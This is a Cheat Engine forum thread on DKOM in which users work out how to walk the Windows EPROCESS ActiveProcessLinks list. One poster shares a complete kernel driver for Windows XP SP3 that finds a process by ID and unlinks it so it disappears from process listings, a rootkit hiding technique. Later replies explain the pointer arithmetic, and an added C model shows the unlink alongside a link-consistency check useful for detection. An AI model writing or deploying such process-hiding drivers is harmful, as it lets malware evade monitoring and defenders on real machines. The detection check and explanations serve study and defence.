Cheat Engine Forum -> General programming

DKOM Question ( EPROCESS Access )

Stylo
Posted: Fri Apr 08, 2011 8:29 am    Post subject: DKOM Question ( EPROCESS Access )

Hi,
Recently I have started reading about DKOM.
I tried accessing the EPROCESS structure to obtain the LIST_ENTRY for the next and previous EPROCESS,
so I could link the previous process to its next one for hiding the process.
After a lot of BSODs I gave up and decided to ask someone who has already done it.
When I'm writing this:
Code:

NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
   PEPROCESS   process;
   PLIST_ENTRY   list_active_procs;

   process = PsGetCurrentProcess();
   list_active_procs = (PLIST_ENTRY)( process + 0x88 /* offset */ );
}

I get a compilation error that says the size of EPROCESS is unknown.
So when I try to access it through inline asm,
I get the BSOD after I access the Flink member of LIST_ENTRY.

Anyone have an idea?

Innovation
Posted: Fri Apr 08, 2011 2:43 pm

The offset to the ActiveProcessLinks member of the EPROCESS structure may change between versions of Windows. Windows XP uses 0x88, while Windows Vista and Windows 7 use 0xA0 and 0xB8, respectively. Also, you should cast the pointer to the EPROCESS structure to an integer of some kind.
Stylo
Posted: Sat Apr 09, 2011 1:27 am

Can you take a look at what I'm doing here?
Code:

#include <ntddk.h>

VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) {
   DbgPrint( "Driver Unloaded!" );
}

NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
   PEPROCESS   process;
   INT         i_process, count = 0, currentProcessId, Addr;
   PLIST_ENTRY   list_active_procs;

   pDriverObject->DriverUnload = OnUnload;
   DbgPrint( "Driver Loaded!" );

   // EPROCESS for the current process
   process = PsGetCurrentProcess();
   while( count ++ < 10 ) {
      // Casting EPROCESS to INT
      i_process = (INT)process;

      // Print EPROCESS Address
      DbgPrint( "EPROCESS Address = %x", i_process );

      // Get the process id from eprocess and print it
      currentProcessId = *(INT*)(i_process + 0x84 /* UniqueProcessId offset for win. xp sp3 */ );
      DbgPrint( "Current Process Id = %d", currentProcessId );

      // Get the LIST_ENTRY from the current EPROCESS
      Addr = *(INT*)(i_process + 0x88 /* ActiveProcessList offset for win. xp sp3 */ );
      list_active_procs = (PLIST_ENTRY)Addr;

      // Get the next EPROCESS (Flink)
      process = (PEPROCESS) list_active_procs->Flink;
   }

   return STATUS_SUCCESS;
}

I'm trying to get the first 10 EPROCESS structures after the current EPROCESS,
but I always get a BSOD.
For the first EPROCESS structure's process ID I always get 4,
so I guess this is the System process.

Innovation
Posted: Sat Apr 09, 2011 8:45 am

The current process will always be the System process unless the driver's execution of the code was caused by an IOCTL, so you're essentially using PsActiveProcessHead. And, as the definition of LIST_ENTRY dictates, Flink points to the next Flink, not the next EPROCESS.

I was unable to test the following code, but hopefully it will work. Keep in mind that ActiveProcessList is a circular doubly-linked list, so if there are less than ten processes, it will wrap back around.

Code:
#include <ntddk.h>

VOID Unload(__in PDRIVER_OBJECT pDriverObject)
{
   DbgPrint("Driver Unloaded!");
}

NTSTATUS DriverEntry(__in PDRIVER_OBJECT pDriverObject, __in PUNICODE_STRING pRegistryPath)
{
   /* Declarations first: the WDK compiles .c files as C89, which rejects
      declarations after statements and "for (int ...)". */
   PEPROCESS pProcess;
   int nProcessIdentifier;
   PLIST_ENTRY pActiveProcessLinks;
   int nCount;

   pDriverObject->DriverUnload = Unload;
   DbgPrint("Driver Loaded!");
   pProcess = PsGetCurrentProcess();   /* the System process when run from DriverEntry */
   for(nCount = 0; nCount < 10; ++nCount)
   {
      DbgPrint("EPROCESS Address = %p", pProcess);
      /* Byte offsets are applied to an integer (DWORD_PTR), never to PEPROCESS */
      nProcessIdentifier = *(int *)((DWORD_PTR)pProcess + 0x84);            /* UniqueProcessId, XP SP3 */
      DbgPrint("Process Identifier = %d", nProcessIdentifier);
      pActiveProcessLinks = (PLIST_ENTRY)((DWORD_PTR)pProcess + 0x88);     /* ActiveProcessLinks, XP SP3 */
      /* Flink addresses the next LIST_ENTRY; subtract its offset to reach the next EPROCESS */
      pProcess = (PEPROCESS)((DWORD_PTR)pActiveProcessLinks->Flink - 0x88);
   }
   return STATUS_SUCCESS;
}
Stylo
Posted: Sat Apr 09, 2011 9:44 am

Innovation wrote:
The current process will always be the System process unless the driver's execution of the code was caused by an IOCTL, so you're essentially using PsActiveProcessHead. And, as the definition of LIST_ENTRY dictates, Flink points to the next Flink, not the next EPROCESS.

I was unable to test the following code, but hopefully it will work. Keep in mind that ActiveProcessList is a circular doubly-linked list, so if there are less than ten processes, it will wrap back around.

Yeah, you were right about that,
and I finally managed to hide a process properly.
Here's the full code for it:
Code:

#include <ntddk.h>

#define   PROCESS_TO_HIDE               1234 // Process Id to hide
#define   EPROCESS_OFFSET_PID            0x84 // UniqueProcessId, Windows XP SP3 (x86)
#define   EPROCESS_OFFSET_ACTIVEPROCS      0x88 // ActiveProcessLinks, Windows XP SP3 (x86)

// Walks ActiveProcessLinks from the current process and returns the EPROCESS
// address for ProcessId, or 0 once the circular list wraps back to the start.
// INT holds addresses here, which only works on 32-bit Windows.
INT GetEprocessByProcessId( INT   ProcessId ) {
   PEPROCESS      eProcess;
   INT            iProcess, iStart, currentProcessId;
   LIST_ENTRY      *list_active_procs;

   eProcess = PsGetCurrentProcess();
   iStart = iProcess = (INT)eProcess;
   do {
      currentProcessId = *(INT*)(iProcess + EPROCESS_OFFSET_PID);
      if( currentProcessId == ProcessId )
         return iProcess;
      list_active_procs = (LIST_ENTRY *)(iProcess + EPROCESS_OFFSET_ACTIVEPROCS);
      // Flink addresses the next LIST_ENTRY; step back to the start of its EPROCESS
      iProcess = (INT)list_active_procs->Flink;
      iProcess -= EPROCESS_OFFSET_ACTIVEPROCS;
   } while( iProcess != iStart );

   return 0x00000000;
}

VOID HideProcess( INT iProcess ) {
   LIST_ENTRY   *list_active_procs;

   list_active_procs = (LIST_ENTRY*)(iProcess + EPROCESS_OFFSET_ACTIVEPROCS);
   // Previous entry's Flink = this entry's Flink
   *((INT*)list_active_procs->Blink) = (INT)list_active_procs->Flink;
   // Next entry's Blink (second pointer of its LIST_ENTRY, hence + 1) = this entry's Flink
   *((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;
   // Make this entry point at itself (Flink == Blink == its own address)
   list_active_procs->Flink = (LIST_ENTRY *) &(list_active_procs->Flink);
   list_active_procs->Blink = (LIST_ENTRY *) &(list_active_procs->Flink);
}

VOID OnUnload( IN PDRIVER_OBJECT pDriverObject ) {
   DbgPrint( "Driver Unloaded!" );
}

NTSTATUS DriverEntry( PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath ) {
   INT      iProcess;

   pDriverObject->DriverUnload = OnUnload;
   DbgPrint( "Driver Loaded!" );
   iProcess = GetEprocessByProcessId( PROCESS_TO_HIDE );
   if( iProcess == 0 ) {
      DbgPrint( "Process %d not found", PROCESS_TO_HIDE );
      return STATUS_SUCCESS;
   }
   DbgPrint( "EPROCESS for %d found", PROCESS_TO_HIDE );
   DbgPrint( "Address = %x", iProcess );
   DbgPrint( "Attempting to hide %d . .", PROCESS_TO_HIDE );
   HideProcess( iProcess );

   return STATUS_SUCCESS;
}

Thank you for your help :D

brunojex
Posted: Tue Jul 09, 2013 10:53 pm

*((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;

I pretty much get everything but this line; I can't figure out why it is Flink + 1 and not just Flink.
Can anyone explain?
Innovation
Posted: Wed Jul 10, 2013 1:58 am

brunojex wrote:
*((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;

I pretty much get everything but this line; I can't figure out why it is Flink + 1 and not just Flink.
Can anyone explain?

It's the same thing (assuming sizeof(LIST_ENTRY *) == sizeof(int *) == sizeof(int)) as:
Code:
list_active_procs->Flink->Blink = list_active_procs->Flink;

See pointer arithmetic.

It was for this reason that I said to cast the pointer to the EPROCESS structure to an integer when dealing with byte offsets, else it will increment in multiples of sizeof(EPROCESS) which was not what was desired. The size of EPROCESS is unknown anyway, and that's why Stylo had compilation errors initially. DWORD_PTR is an integer Windows data type created specifically for this sort of scenario and what I used in my example code.
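As an added example (not code from the thread), here is a user-mode C model of the walk and of the two link edits in Stylo's HideProcess, covering both of Innovation's points above: Flink addresses the next LIST_ENTRY, so the record is recovered by subtracting the link's offset, and "+ 1" advances by the size of the pointed-to type. PROC_REC, RECORD_OF and the three-entry list are constructed stand-ins for EPROCESS and the real ActiveProcessLinks list. The closing count_inconsistent_links is the kind of self-consistency check a defender runs over kernel lists; it only flags links that disagree with their neighbours, so in practice hidden processes are found by comparing the walk with an independent view of running processes, not by this check alone.

```c
#include <stddef.h>
#include <stdint.h>
typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;
typedef struct _PROC_REC {          /* constructed stand-in for EPROCESS        */
    uint8_t    pad[0x84];           /* fields before UniqueProcessId            */
    int        UniqueProcessId;     /* at 0x84, the XP SP3 offset in the thread */
    LIST_ENTRY ActiveProcessLinks;  /* at 0x88: Flink, Blink                    */
} PROC_REC;
/* What the thread's "Flink - 0x88" does: recover the record from its link. */
#define RECORD_OF(link) \
    ((PROC_REC *)((uintptr_t)(link) - offsetof(PROC_REC, ActiveProcessLinks)))
/* Forward walk like the driver's loop; fills `pids`, returns how many it saw. */
static int walk_pids(LIST_ENTRY *head, int *pids, int max) {
    int n = 0; LIST_ENTRY *e;
    for (e = head->Flink; e != head && n < max; e = e->Flink)
        pids[n++] = RECORD_OF(e)->UniqueProcessId;
    return n;
}
/* Self-consistency check for any doubly linked kernel list: each link must be
 * confirmed by the neighbour it points at. Returns the number of bad entries. */
static int count_inconsistent_links(LIST_ENTRY *head) {
    int bad = 0; LIST_ENTRY *e = head;
    do { if (e->Flink->Blink != e || e->Blink->Flink != e) bad++; }
    while ((e = e->Flink) != head);
    return bad;
}
/* The writes from the thread's HideProcess; "+ 1" on a uintptr_t * advances one
 * pointer width, so it reaches Blink on x86 and x64 (the thread's INT cast does not on x64). */
static void thread_unlink(PROC_REC *rec) {
    LIST_ENTRY *e = &rec->ActiveProcessLinks;
    *(LIST_ENTRY **)e->Blink = e->Flink;                     /* prev->Flink = next */
    *(LIST_ENTRY **)((uintptr_t *)e->Flink + 1) = e->Flink;  /* next->Blink = next */
    e->Flink = e->Blink = e;                                 /* entry points to self */
}
/* Constructed 3-process list; hide PID 1234 the thread's way; report what the
 * walk and the link check see. Returns the walk's count (2: PIDs 4 and 77). */
static int demo(int *pids, int *bad_before, int *bad_after) {
    static PROC_REC recs[3];
    LIST_ENTRY head = { &head, &head }, *e;
    int pid_values[3] = { 4, 1234, 77 }, i;
    for (i = 0; i < 3; i++) {                       /* list: head, 4, 1234, 77 */
        recs[i].UniqueProcessId = pid_values[i]; e = &recs[i].ActiveProcessLinks;
        e->Flink = &head; e->Blink = head.Blink;
        head.Blink->Flink = e; head.Blink = e;
    }
    *bad_before = count_inconsistent_links(&head);  /* 0: every link confirmed */
    thread_unlink(&recs[1]);
    *bad_after = count_inconsistent_links(&head);   /* 2: the neighbours disagree */
    return walk_pids(&head, pids, 3);
}
```

After the thread's edits the forward walk no longer reports 1234, while the previous entry's Flink and the next entry's Blink no longer confirm each other, which is what the check counts.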
brunojex
Posted: Wed Jul 10, 2013 8:32 pm

Ah, I was reading it wrong actually :(
Code:
*((INT*)list_active_procs->Flink + 1) = (INT)list_active_procs->Flink;

This is changing the forward process's Blink field.
Code:
*((INT*)list_active_procs->Blink) = (INT)list_active_procs->Flink;

And this is changing the rearward process's Flink field.

I was thinking of it the other way around, that's why I got confused. My mistake....
Anyways, thanks for the reply, it helped me figure out I was mistaken.

So a pointer + 1 will always be sizeof(pointer) bytes from the original pointer,
but if it ain't a pointer but a DWORD + 1, for example, it will only be 1 byte from the original address, right?
All times are GMT - 6 Hours